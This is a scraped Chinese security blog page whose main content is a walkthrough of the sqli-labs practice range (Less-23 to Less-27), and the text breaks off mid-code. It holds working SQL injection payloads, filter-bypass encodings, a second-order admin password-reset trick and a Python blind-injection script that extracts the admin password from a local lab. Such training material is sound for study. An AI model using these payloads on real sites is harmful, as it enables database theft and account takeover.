href="/2020/02/08/Hexo速度优化及遇到的问题(gulp4、hexo-neat)/" data-tag=Hexo,Hexo性能优化 data-author><span class=post-title title=Hexo速度优化及遇到的问题(gulp4、hexo-neat)>Hexo速度优化及遇到的问题(gulp4、hexo-neat)</span> <span class=post-date title="2020-02-08 00:24:25">2020/02/08</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/21/Python学习-基础篇(四)/" data-tag=异常处理及程序调试,文件及目录操作,操作数据库 data-author><span class=post-title title=Python学习-基础篇(四)>Python学习-基础篇(四)</span> <span class=post-date title="2020-01-21 21:31:15">2020/01/21</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/19/Python学习-基础篇(三)/" data-tag=字符串及正则表达式,函数,模块 data-author><span class=post-title title=Python学习-基础篇(三)>Python学习-基础篇(三)</span> <span class=post-date title="2020-01-19 18:16:50">2020/01/19</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/18/Python学习-基础篇(二)/" data-tag=序列的应用,列表,元组,字典,集合 data-author><span class=post-title title=Python学习-基础篇(二)>Python学习-基础篇(二)</span> <span class=post-date title="2020-01-18 20:01:31">2020/01/18</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/16/Python学习-基础篇(一)/" data-tag=开发工具,基本语法,流程控制 data-author><span class=post-title title=Python学习-基础篇(一)>Python学习-基础篇(一)</span> <span class=post-date title="2020-01-16 22:29:30">2020/01/16</span></a> <a class="全部文章 运维 Linux基础" href="/2020/01/07/Linux虚拟机常见使用及常见问题/" data-tag=Linux,问题整理 data-author><span class=post-title title=Linux虚拟机常见使用及常见问题>Linux虚拟机常见使用及常见问题</span> <span class=post-date title="2020-01-07 16:08:02">2020/01/07</span></a> <a class="全部文章 复习" href="/2019/12/26/Linux基础期末整理复习/" data-tag=Linux,期末复习 data-author><span class=post-title title=Linux基础期末整理复习>Linux基础期末整理复习</span> <span class=post-date title="2019-12-26 16:50:43">2019/12/26</span></a> <a class="全部文章 线下赛 AWD" href="/2019/12/16/AWD模式总结与2019河南高校网安联赛复现/" data-tag=河南高校网安联赛,复现 data-author><span class=post-title title=AWD模式总结与2019河南高校网安联赛复现>AWD模式总结与2019河南高校网安联赛复现</span> <span class=post-date title="2019-12-16 22:58:25">2019/12/16</span></a> <a class="全部文章 漏洞原理 XXE漏洞" href="/2019/12/02/从XML相关一步一步到XXE漏洞/" data-tag=XML,XML注入,Xpath注入,XXE漏洞 data-author><span class=post-title title=从XML相关一步一步到XXE漏洞>从XML相关一步一步到XXE漏洞</span> <span class=post-date title="2019-12-02 14:47:00">2019/12/02</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/16/sqli-labs攻关5(Sta)(Less-39_Less-53)/" data-tag="题目复现,靶场练习,堆叠注入,order by排序注入,异或注入" data-author><span class=post-title title=sqli-labs攻关5(Sta)(Less-39_Less-53)>sqli-labs攻关5(Sta)(Less-39_Less-53)</span> <span class=post-date title="2019-11-16 23:58:43">2019/11/16</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/12/sqli-labs攻关4(Adv)(Less-23_Less-38)/" data-tag=靶场练习,二次注入,过滤敏感关键字与WAF绕过,宽字节注入 data-author><span class=post-title title=sqli-labs攻关4(Adv)(Less-23_Less-38)>sqli-labs攻关4(Adv)(Less-23_Less-38)</span> <span class=post-date title="2019-11-12 23:02:46">2019/11/12</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/06/sqli-labs攻关3(Less-11-Less-22)/" data-tag=靶场练习,POST型联合查询注入,POST型报错注入,POST型盲注 data-author><span class=post-title title=sqli-labs攻关3(Less-11_Less-22)>sqli-labs攻关3(Less-11_Less-22)</span> <span class=post-date title="2019-11-06 23:55:21">2019/11/06</span></a> <a class="全部文章 漏洞原理 协议层漏洞" href="/2019/10/27/从一道题到HTTP请求走私/" data-tag=题目复现,HTTP,HTTP请求走私 data-author><span class=post-title title=从一道题到HTTP请求走私>从一道题到HTTP请求走私</span> <span class=post-date title="2019-10-27 23:13:44">2019/10/27</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/10/26/SQL盲注的简单分析/" data-tag=SQL盲注 data-author><span class=post-title title=SQL盲注的简单分析>SQL盲注的简单分析</span> <span class=post-date title="2019-10-26 21:50:20">2019/10/26</span></a> <a class="全部文章 漏洞原理 文件操作漏洞" href="/2019/10/19/任意文件读取与下载漏洞/" data-tag=题目复现,任意文件读取漏洞,任意文件下载漏洞 data-author><span class=post-title title=任意文件读取与下载漏洞>任意文件读取与下载漏洞</span> <span class=post-date title="2019-10-19 01:01:11">2019/10/19</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/09/25/SQL注入-报错注入/" data-tag=报错注入 data-author><span class=post-title title=SQL注入-报错注入>SQL注入-报错注入</span> <span class=post-date title="2019-09-25 00:21:26">2019/09/25</span></a> <a class="全部文章 CTF" href="/2019/09/05/攻防世界-Web(进阶区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(进阶区)>攻防世界-Web(进阶区)</span> <span class=post-date title="2019-09-05 23:46:17">2019/09/05</span></a> <a class="全部文章 CTF" href="/2019/09/02/i春秋-Web(一)/" data-tag=CTF,Web,i春秋 data-author><span class=post-title title=i春秋-Web(一)>i春秋-Web(一)</span> <span class=post-date title="2019-09-02 20:41:21">2019/09/02</span></a> <a class="全部文章 CTF" href="/2019/08/25/南邮-Web(二)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(二)>南邮-Web(二)</span> <span class=post-date title="2019-08-25 18:31:58">2019/08/25</span></a> <a class="全部文章 漏洞原理 文件包含漏洞" href="/2019/08/21/文件包含漏洞/" data-tag=漏洞利用,漏洞基础,漏洞绕过,PHP伪协议 data-author><span class=post-title title=文件包含漏洞>文件包含漏洞</span> <span class=post-date title="2019-08-21 21:28:09">2019/08/21</span></a> <a class="全部文章 漏洞原理 信息泄露" href="/2019/08/15/常见Web源码泄露/" data-tag=源码泄露,源码泄露类型 data-author><span class=post-title title=常见Web源码泄露>常见Web源码泄露</span> <span class=post-date title="2019-08-15 20:03:10">2019/08/15</span></a> <a class="全部文章 漏洞原理 反序列化漏洞" href="/2019/08/14/PHP反序列化漏洞/" data-tag=PHP类与对象,序列化与反序列化基础,魔术方法简单利用 data-author><span class=post-title title=PHP反序列化漏洞>PHP反序列化漏洞</span> <span class=post-date title="2019-08-14 23:29:51">2019/08/14</span></a> <a class="全部文章 漏洞原理 命令注入" href="/2019/08/08/命令执行(Command Injection)与代码执行(Code execution)/" data-tag=命令执行,代码执行 data-author><span class=post-title title="命令执行(Command Injection)与代码执行(Code execution)">命令执行(Command Injection)与代码执行(Code execution)</span> <span class=post-date title="2019-08-08 23:11:51">2019/08/08</span></a> <a class="全部文章 CTF" href="/2019/08/06/Crypto-RSA加密/" data-tag=CTF,Crypto,RSA data-author><span class=post-title title=Crypto-RSA加密>Crypto-RSA加密</span> <span class=post-date title="2019-08-06 23:16:34">2019/08/06</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/08/03/文件上传漏洞 学习笔记(二)/" data-tag=白名单绕过,内容绕过,竞争条件绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(二)">文件上传漏洞 学习笔记(二)</span> <span class=post-date title="2019-08-03 10:22:22">2019/08/03</span></a> <a class="全部文章 CTF" href="/2019/08/02/CTF做题总结(二)/" data-tag=Web,Reverse,SQL,盲注 data-author><span class=post-title title=CTF做题总结(二)>CTF做题总结(二)</span> <span class=post-date title="2019-08-02 11:22:58">2019/08/02</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/07/31/文件上传漏洞 学习笔记(一)/" data-tag=JS绕过,MIME绕过,黑名单绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(一)">文件上传漏洞 学习笔记(一)</span> <span class=post-date title="2019-07-31 23:01:05">2019/07/31</span></a> <a class="全部文章 CTF" href="/2019/07/25/南邮-Web(一)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(一)>南邮-Web(一)</span> <span class=post-date title="2019-07-25 20:05:46">2019/07/25</span></a> <a class="全部文章 CTF" href="/2019/07/21/Crypto-简单加密/" data-tag=CTF,Crypto,简单加密 data-author><span class=post-title title=Crypto-简单加密>Crypto-简单加密</span> <span class=post-date title="2019-07-21 21:30:41">2019/07/21</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/07/19/sqli-labs攻关2(Less-7_Less-10)/" data-tag=导出文件注入,GET型盲注,靶场练习 data-author><span class=post-title title=sqli-labs攻关2(Less-7_Less-10)>sqli-labs攻关2(Less-7_Less-10)</span> <span class=post-date title="2019-07-19 22:05:21">2019/07/19</span></a> <a class="全部文章 CTF" href="/2019/07/17/攻防世界-Web(新手区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(新手区)>攻防世界-Web(新手区)</span> <span class=post-date title="2019-07-17 21:22:27">2019/07/17</span></a> <a class="全部文章 CTF" href="/2019/07/15/安恒月赛7月-MISC wp/" data-tag=CTF,MISC,安恒 data-author><span class=post-title title="安恒月赛7月-MISC wp">安恒月赛7月-MISC wp</span> <span class=post-date title="2019-07-15 19:33:17">2019/07/15</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/07/14/XSS漏洞攻关(二)/" data-tag=XSS绕过 data-author><span class=post-title title=XSS漏洞攻关(二)>XSS漏洞攻关(二)</span> <span class=post-date title="2019-07-14 19:01:42">2019/07/14</span></a> <a class="全部文章 CTF" href="/2019/07/12/Crypto-位移编码/" data-tag=CTF,Crypto,移位编码 data-author><span class=post-title title=Crypto-位移编码>Crypto-位移编码</span> <span class=post-date title="2019-07-12 21:32:41">2019/07/12</span></a> <a class="全部文章 CTF" href="/2019/07/10/MISC-图片隐写/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-图片隐写>MISC-图片隐写</span> <span class=post-date title="2019-07-10 21:05:43">2019/07/10</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/24/ISCC2019线下赛总结/" data-tag=ISCC,感悟 data-author><span class=post-title title=ISCC2019线下赛总结>ISCC2019线下赛总结</span> <span class=post-date title="2019-06-24 00:07:01">2019/06/24</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/19/CTF线下赛AWD攻防准备/" data-tag=准备 data-author><span class=post-title title=CTF线下赛AWD攻防准备>CTF线下赛AWD攻防准备</span> <span class=post-date title="2019-06-19 19:45:58">2019/06/19</span></a> <a class="全部文章 CTF" href="/2019/06/18/BUGKU做题总结(一)/" data-tag=CTF,BUGKU,MISC data-author><span class=post-title title=BUGKU做题总结(一)>BUGKU做题总结(一)</span> <span class=post-date title="2019-06-18 21:11:11">2019/06/18</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/06/10/sqli-labs攻关1(Less-1_Less-6)/" data-tag=靶场练习,GET型联合查询注入,GET型双查询注入 data-author><span class=post-title title=sqli-labs攻关1(Less-1_Less-6)>sqli-labs攻关1(Less-1_Less-6)</span> <span class=post-date title="2019-06-10 19:03:52">2019/06/10</span></a> <a class="全部文章 编程开发 PHP" href="/2019/06/05/Web开发-简单BBS论坛/" data-tag=Web开发,bbs论坛 data-author><span class=post-title title=Web开发-简单BBS论坛>Web开发-简单BBS论坛</span> <span class=post-date title="2019-06-05 17:32:32">2019/06/05</span></a> <a class="全部文章 协议分析 HTTP协议" href="/2019/05/29/HTTP协议基础/" data-tag=HTTP协议,HTTP头流量包 data-author><span class=post-title title=HTTP协议基础>HTTP协议基础</span> <span class=post-date title="2019-05-29 20:39:42">2019/05/29</span></a> <a class="全部文章 CTF" href="/2019/05/27/ISCC-MISC做题总结/" data-tag=CTF,MISC,ISCC data-author><span class=post-title title=ISCC-MISC做题总结>ISCC-MISC做题总结</span> <span class=post-date title="2019-05-27 18:53:14">2019/05/27</span></a> <a class="全部文章 编程开发 PHP" href="/2019/05/04/Web开发-PHP基础篇(四)/" data-tag=MySQL学习,PHP与MySQL交互 data-author><span class=post-title title=Web开发-PHP基础篇(四)>Web开发-PHP基础篇(四)</span> <span class=post-date title="2019-05-04 15:18:37">2019/05/04</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/04/28/XSS漏洞攻关(一)/" data-tag=XSS绕过,XSS基础 data-author><span class=post-title title=XSS漏洞攻关(一)>XSS漏洞攻关(一)</span> <span class=post-date title="2019-04-28 17:00:44">2019/04/28</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/27/Web开发-PHP基础篇(三)/" data-tag=正则表达式,日期和时间,图像处理,文件与目录操作,会话控制 data-author><span class=post-title title=Web开发-PHP基础篇(三)>Web开发-PHP基础篇(三)</span> <span class=post-date title="2019-04-27 15:02:06">2019/04/27</span></a> <a class="全部文章 线下赛 团队内部" href="/2019/04/26/一次团队内部比赛经历/" data-tag=BUG,SQL注入,PHP data-author><span class=post-title title=一次团队内部比赛经历>一次团队内部比赛经历</span> <span class=post-date title="2019-04-26 22:59:01">2019/04/26</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/26/php mysql html css制作带Cookie登陆页面/" data-tag=Web开发,登录和注册功能 data-author><span class=post-title title="php mysql html css制作带Cookie登陆页面">php mysql html css制作带Cookie登陆页面</span> <span class=post-date title="2019-04-26 10:08:26">2019/04/26</span></a> <a class="全部文章 CTF" href="/2019/04/16/CTF做题总结(一)/" data-tag=CTF,MISC,Crypto data-author><span class=post-title title=CTF做题总结(一)>CTF做题总结(一)</span> <span class=post-date title="2019-04-16 11:27:05">2019/04/16</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/15/Web开发-PHP基础篇(一~二)/" data-tag=函数,基本语法,流程控制,数组,字符串 data-author><span class=post-title title=Web开发-PHP基础篇(一-二)>Web开发-PHP基础篇(一-二)</span> <span class=post-date title="2019-04-15 20:22:18">2019/04/15</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-隐写的总结/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-隐写的总结>MISC-隐写的总结</span> <span class=post-date title="2019-04-06 18:33:32">2019/04/06</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-zip压缩包的总结/" data-tag=CTF,MISC,ZIP data-author><span class=post-title title=MISC-zip压缩包的总结>MISC-zip压缩包的总结</span> <span class=post-date title="2019-04-06 00:21:56">2019/04/06</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/30/Web前端-CSS篇/" data-tag=Web前端,CSS data-author><span class=post-title title=Web前端-CSS篇>Web前端-CSS篇</span> <span class=post-date title="2019-03-30 19:39:32">2019/03/30</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/25/Web前端-HTML篇/" data-tag=Web前端,HTML data-author><span class=post-title title=Web前端-HTML篇>Web前端-HTML篇</span> <span class=post-date title="2019-03-25 22:54:31">2019/03/25</span></a> <a class="全部文章 博客" href="/2019/03/17/Github-Hexo的搭建/" data-tag=Hexo,Github,Hexo搭建 data-author><span class=post-title title=Github-Hexo简单搭建>Github-Hexo简单搭建</span> <span class=post-date title="2019-03-17 12:36:45">2019/03/17</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/15/html基础篇一/" data-tag=Web前端,HTML data-author><span class=post-title title=超文本标记语言html>超文本标记语言html</span> <span class=post-date title="2019-03-15 23:43:10">2019/03/15</span></a> <a class="全部文章 工具学习 phpstudy" href="/2019/03/15/phpstudy-MySQL基础篇一/" data-tag=Web,数据库 data-author><span class=post-title title=phpstudy-MySQL的简单使用以及cmd打开MySQL>phpstudy-MySQL的简单使用以及cmd打开MySQL</span> <span class=post-date title="2019-03-15 23:39:20">2019/03/15</span></a> <a class="全部文章 First" href="/2019/03/12/hello-world/" data-tag data-author><span class=post-title title="Hello world">Hello world</span> <span class=post-date title="2019-03-12 22:33:11">2019/03/12</span></a><div id=no-item-tips></div></nav><div id=outline-list></div></div></div><div class=hide-list><div class=semicircle data-title="切换全屏 快捷键 s"><div class="brackets first"><</div><div class=brackets>&gt;</div></div></div></aside><div id=post><div class=pjax><article id=post-sqli-labs攻关4(Adv)(Less-23_Less-38) class="article article-type-post" itemscope itemprop=blogPost><h1 class=article-title>sqli-labs攻关4(Adv)(Less-23_Less-38)</h1><div class=article-meta><span class=book><i class="iconfont icon-category"></i> <a data-rel=漏洞原理>漏洞原理</a> > <a data-rel=漏洞原理&lt;---&gt;SQL注入>SQL注入</a></span> <span class=tag><i class="iconfont icon-tag"></i> <a class=color5>靶场练习</a> <a class=color5>二次注入</a> <a class=color4>过滤敏感关键字与WAF绕过</a> <a class=color1>宽字节注入</a></span></div><div class=article-meta>发布时间 :<time class=date title="最后更新: 2020-08-02 00:56:22">2019-11-12 23:02</time></div><div class=article-meta><span>字数:3.8k</span> <span id=busuanzi_container_page_pv>阅读 :<span id=busuanzi_value_page_pv><span class=count-comment><span class=spinner><div class=cube1></div><div class=cube2></div></span></span></span></span></div><div class=toc-ref><ol class=toc><li class="toc-item toc-level-3"><a class=toc-link href=#前言><span class=toc-text>前言</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#一、二次注入-Less-24><span class=toc-text>一、二次注入(Less-24)</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#二、GET型过滤敏感关键字注入-Less-23-Less-28a><span class=toc-text>二、GET型过滤敏感关键字注入(Less-23-Less-28a)</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#三、WAF绕过注入-Less-29-Less-31><span class=toc-text>三、WAF绕过注入(Less-29-Less-31)</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#四、宽字节注入-Less-32-Less-38><span class=toc-text>四、宽字节注入(Less-32-Less-38)</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#后记><span class=toc-text>后记</span></a></li></ol><style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-5 i,
    .toc-level-5 ol {
        display: none !important;
    }
</style></div><div class=article-entry itemprop=articleBody><h3 id=前言><a href=#前言 class=headerlink title=前言></a>前言</h3><p>总结完最常见的GET型和POST型的联合查询注入、报错注入、SQL盲注，以及简单POST注入。于是继续总结二次注入、GET型过滤敏感关键字注入、WAF绕过注入、宽字节注入。</p><h3 id=一、二次注入-Less-24><a href=#一、二次注入-Less-24 class=headerlink title=一、二次注入(Less-24)></a>一、二次注入(Less-24)</h3><p><strong>二次注入</strong>：攻击者构造的恶意数据存储到数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。<br><strong>二次注入需要具备的两个条件</strong>：</p><ol><li>用户向数据库插入恶意语句(即使后端对语句进行了转义，如<code>mysql_escape_string</code>、<code>mysql_real_escape_string</code>转义)</li><li>数据库对自己存储的数据非常放心，直接取出恶意数据给用户</li></ol><p><strong>Less-24</strong><br>猜测这是二次注入，查看源码发现与数据库交互的有注册、登录和改密，即<code>login_create.php</code>，<code>login.php</code>，<code>pass_change.php</code>这三个文件。<br>login_create.php</p><pre><code class=php>$username=  mysql_escape_string($_POST[&#39;username&#39;]) ;
$pass= mysql_escape_string($_POST[&#39;password&#39;]);
$re_pass= mysql_escape_string($_POST[&#39;re_password&#39;]);

echo &quot;&lt;font size=&#39;3&#39; color=&#39;#FFFF00&#39;&gt;&quot;;
$sql = &quot;select count(*) from users where username=&#39;$username&#39;&quot;;</code></pre><p>login.php</p><pre><code class=php>$username = mysql_real_escape_string($_POST[&quot;login_user&quot;]);
$password = mysql_real_escape_string($_POST[&quot;login_password&quot;]);
$sql = &quot;SELECT * FROM users WHERE username=&#39;$username&#39; and password=&#39;$password&#39;&quot;;</code></pre><p>pass_change.php</p><pre><code class=php>$username= $_SESSION[&quot;username&quot;];
$curr_pass= mysql_real_escape_string($_POST[&#39;current_password&#39;]);
$pass= mysql_real_escape_string($_POST[&#39;password&#39;]);
$re_pass= mysql_real_escape_string($_POST[&#39;re_password&#39;]);

if($pass==$re_pass)
{    
    $sql = &quot;UPDATE users SET PASSWORD=&#39;$pass&#39; where username=&#39;$username&#39; and password=&#39;$curr_pass&#39; &quot;;</code></pre><p>发现很多传参都被过滤之后，才执行SQL语句，主要利用了<a href=http://www.w3school.com.cn/php/func_mysql_real_escape_string.asp target=_blank rel=noopener>mysql_real_escape_string()函数</a><br>只有<code>$_SESSION[&quot;username&quot;]</code>没有被过滤。这个SQL语句是用来更改密码的。<br><img src=http://img-blog.csdnimg.cn/20191109195335374.jpg alt=在这里插入图片描述><br><code>mysql_real_escape_string()</code>函数只会过滤以下字符：<code>\x00</code>、<code>\n</code>、<code>\r</code>、<code>\</code>、<code>&#39;</code>、<code>&quot;</code>、<code>\x1a</code><br>而注释是不会过滤掉的，所以可以注册一个包含注释符号(如：<code>#</code>)的username，然后用这个username更改密码的时候会被注入到update语句中，更改注释前面的用户名的密码。</p><p>假设我们想登录admin账户且不知道账户密码。如果要更改用户名为admin的密码，只需注册一个<code>admin&#39;#</code>用户<br><img src=http://img-blog.csdnimg.cn/20191109201228226.jpg alt=在这里插入图片描述><br>然后登陆，更改密码为1234。看下数据库，发现admin账户的密码被改成了1234<br><img src=http://img-blog.csdnimg.cn/20191109201548493.jpg alt=在这里插入图片描述><br>然后登录框，输入<code>admin 1234</code>就可以登录admin账户了。。。<br><img src=http://img-blog.csdnimg.cn/20191109201959421.jpg alt=在这里插入图片描述></p><h3 id=二、GET型过滤敏感关键字注入-Less-23-Less-28a><a href=#二、GET型过滤敏感关键字注入-Less-23-Less-28a class=headerlink title=二、GET型过滤敏感关键字注入(Less-23-Less-28a)></a>二、GET型过滤敏感关键字注入(Less-23-Less-28a)</h3><p><strong>Less-23(过滤注释)</strong><br>添加<code>\</code>发现报错，得到闭合方式为<code>&#39;</code><br><img src=http://img-blog.csdnimg.cn/20191109214423747.jpg alt=在这里插入图片描述><br>测试发现<code>--+</code>、<code>#</code>和<code>%23</code>都被过滤了,即过滤了注释。<br><img src=http://img-blog.csdnimg.cn/20191109214715754.jpg alt=在这里插入图片描述><br>所以就只能用闭合后面引号的方法，根据报错可以知道语句为<code>id=&#39;$ID&#39; limit 0,1</code><br>那么可以这样闭合<code>id=1&#39; or &#39;1&#39;=&#39;1</code>或者是<code>id=1&#39; and &#39;1&#39;=&#39;1</code><br>其他注入操作，可以使用联合查询注入或报错注入或延时注入。这里举个爆库的例子<br><strong>联合查询注入</strong><br>联合查询前边步骤就不写了。直接爆库</p><pre><code class=sql>id=-1&#39; union select 1,database(),&#39;3</code></pre><p><img src=http://img-blog.csdnimg.cn/20191109220049111.jpg alt=在这里插入图片描述><br><strong>报错注入</strong></p><pre><code class=sql>id=1&#39; and updatexml(1,concat(0x7e,database(),0x7e),1) and &#39;1&#39;=&#39;1</code></pre><p><img src=http://img-blog.csdnimg.cn/20191109220432352.jpg alt=在这里插入图片描述><br><strong>延时注入(SQL盲注)</strong></p><pre><code class=sql>id=1&#39; and if(length(database())=8,sleep(5),1) and &#39;1&#39;=&#39;1</code></pre><pre><code class=sql>id=1&#39; and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1) and &#39;1&#39;=&#39;1</code></pre><p><strong>Less-25(过滤了or和and)</strong><br>单引号报错,依旧是单引号闭合，注释正常。<br><img src=http://img-blog.csdnimg.cn/20191109222352459.jpg alt=在这里插入图片描述><br>根据题目，发现果然是被过滤了and和or。然后看了一下源码怎么写的</p><pre><code class=php>function blacklist($id)
{
    $id= preg_replace(&#39;/or/i&#39;,&quot;&quot;, $id);            //strip out OR (non case sensitive)
    $id= preg_replace(&#39;/AND/i&#39;,&quot;&quot;, $id);        //Strip out AND (non case sensitive)
    return $id;
}</code></pre><p>发现使用<a href=https://www.cnblogs.com/hubqin/p/6749433.html target=_blank rel=noopener>模式修正符</a><code>i</code>，<code>i</code> 在和模式进行匹配时不区分大小写。<br>所以不可以使用大小写绕过。<br><img src=http://img-blog.csdnimg.cn/20191109222937171.png alt=在这里插入图片描述><br>可以用逻辑运算符<code>&amp;&amp;</code>代替and，<code>||</code>代替or。但&amp;要换成%26url编码</p><pre><code class=sql>id=1&#39; || 1=1--+</code></pre><pre><code class=sql>id=1&#39; %26%26 1=1--+</code></pre><p>当然也可以使用双写绕过<code>aandnd</code>、<code>oorr</code>。<br>然后其他注入操作呢，依旧可以使用联合查询注入、报错注入，和Less-23类似。<br><strong>报错注入</strong></p><pre><code class=sql>id=1&#39; || updatexml(1,concat(0x7e,database(),0x7e),1)--+</code></pre><p><img src=http://img-blog.csdnimg.cn/20191109224312178.jpg alt=在这里插入图片描述><br><strong>Less-25a(过滤or和and的盲注)</strong><br>将Less-25的单引号字符型改为整型，然后使用盲注即可，注意双写绕过。<br><strong>布尔盲注</strong></p><pre><code class=sql>id=1 || length(database())=8 --+</code></pre><p>可以写个脚本，这里直接放上飘零师傅的脚本</p><pre><code class=python>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
#url = &quot;http://localhost/sql/Less-25a/?id=2333 || ascii(substr((select database()),%s,1))=%d&quot;
#url = &quot;http://localhost/sql/Less-25a/?id=2333 || ascii(substr((select group_concat(table_name) from infoorrmation_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%d&quot;
#url = &quot;http://localhost/sql/Less-25a/?id=2333 || ascii(substr((select group_concat(column_name) from infoorrmation_schema.columns where table_name=&#39;users&#39;),%s,1))=%d&quot;
url = &quot;http://localhost/sql/Less-25a/?id=2333 || ascii(substr((select passwoorrd from users where username=&#39;admin&#39;),%s,1))=%d&quot;
result = &quot;&quot;
# 爆库：select database()
# security
# 爆表：select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()
# emails,referers,uagents,users
# 爆字段：select group_concat(column_name) from infoorrmation_schema.columns where table_name=&#39;users&#39;
# USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
# 拿数据：select passwoorrd from user where username=&#39;admin&#39;
# 2333
for i in range(1,100):
    for j in range(33,127):
        payload = url%(i,j)
        s = requests.get(url=payload)
        if &quot;Your Login name:Dumb&quot; in s.content:
            result += chr(j)
            print result
            break
print result</code></pre><p>当然也可以联合查询注入。</p><pre><code class=sql>id=-1 union select 1,database(),3--+</code></pre><p><img src=http://img-blog.csdnimg.cn/20191109235530481.jpg alt=在这里插入图片描述><br><strong>Less-26(过滤注释和空格)</strong><br>题目标题说过滤了注释和空格。测试一下，看看是不是过滤了注释和空格。试了一把，发现还过滤了and和or。<br>输入</p><pre><code class=sql>?id=and or 1=1--+#</code></pre><p><img src=http://img-blog.csdnimg.cn/20191111220750831.jpg alt=在这里插入图片描述><br>然后又查看下源码</p><pre><code class=php>function blacklist($id)
{
    $id= preg_replace(&#39;/or/i&#39;,&quot;&quot;, $id);            //strip out OR (non case sensitive)
    $id= preg_replace(&#39;/and/i&#39;,&quot;&quot;, $id);        //Strip out AND (non case sensitive)
    $id= preg_replace(&#39;/[\/\*]/&#39;,&quot;&quot;, $id);        //strip out /*
    $id= preg_replace(&#39;/[--]/&#39;,&quot;&quot;, $id);        //Strip out --
    $id= preg_replace(&#39;/[#]/&#39;,&quot;&quot;, $id);            //Strip out #
    $id= preg_replace(&#39;/[\s]/&#39;,&quot;&quot;, $id);        //Strip out spaces
    $id= preg_replace(&#39;/[\/\\\\]/&#39;,&quot;&quot;, $id);        //Strip out slashes
    return $id;
}</code></pre><p>发现过滤了<code>and</code>，<code>or</code>，<code>单行多行注释</code>，<code>正反斜杠/与\</code> ,<code>空格</code>，没有过滤单引号。<br>对于注释可以进行单引号闭合，不使用注释；<br>对于<code>and</code>和<code>or</code>可以双写绕过；<br>对于空格，看大师傅博客，发现了一些方法：</p><blockquote><p>%09 TAB键（水平）<br>%09 TAB键（水平）<br>%0a 新建一行<br>%0c 新的一页<br>%0d return功能<br>%0b TAB键（垂直）<br>%a0 空格(应该是php转化的时候是一个特殊字符，然后mysql会解释为空白字符)</p></blockquote><p>然后，可以进行明注：联合查询注入、报错注入，也可以进行盲注。<br>这里我使用<code>%a0</code>代替空格(这里测试下爆库)。<br>试了若干次。。。发现Windows下无法使用这些特殊字符来替换空格。那就用linux(我用的ubantu)吧。。。</p><pre><code class=sql>id=0&#39;%a0union%a0select%a02,database(),&#39;3</code></pre><p><img src=http://img-blog.csdnimg.cn/20191112000314272.jpg alt=在这里插入图片描述><br><strong>Less-26a(过滤注释和空格的盲注)</strong><br>与Less-26相比，闭合方式变为<code>&#39;)</code>，且不会显示报错语句<br><strong>Less-27(过滤union和select)</strong><br>标题说过滤了<code>union</code>和<code>select</code>，我测试后发现还过滤了空格和注释。并且测试发现是单引号闭合<br>为了更加清楚的知道过滤了什么，查看源码</p><pre><code class=php>function blacklist($id)
{
$id= preg_replace(&#39;/[\/\*]/&#39;,&quot;&quot;, $id);        //strip out /*
$id= preg_replace(&#39;/[--]/&#39;,&quot;&quot;, $id);        //Strip out --.
$id= preg_replace(&#39;/[#]/&#39;,&quot;&quot;, $id);            //Strip out #.
$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);        //Strip out spaces.
$id= preg_replace(&#39;/select/m&#39;,&quot;&quot;, $id);        //Strip out spaces.
$id= preg_replace(&#39;/[ +]/&#39;,&quot;&quot;, $id);        //Strip out spaces.
$id= preg_replace(&#39;/union/s&#39;,&quot;&quot;, $id);        //Strip out union
$id= preg_replace(&#39;/select/s&#39;,&quot;&quot;, $id);        //Strip out select
$id= preg_replace(&#39;/UNION/s&#39;,&quot;&quot;, $id);        //Strip out UNION
$id= preg_replace(&#39;/SELECT/s&#39;,&quot;&quot;, $id);        //Strip out SELECT
$id= preg_replace(&#39;/Union/s&#39;,&quot;&quot;, $id);        //Strip out Union
$id= preg_replace(&#39;/Select/s&#39;,&quot;&quot;, $id);        //Strip out select
return $id;
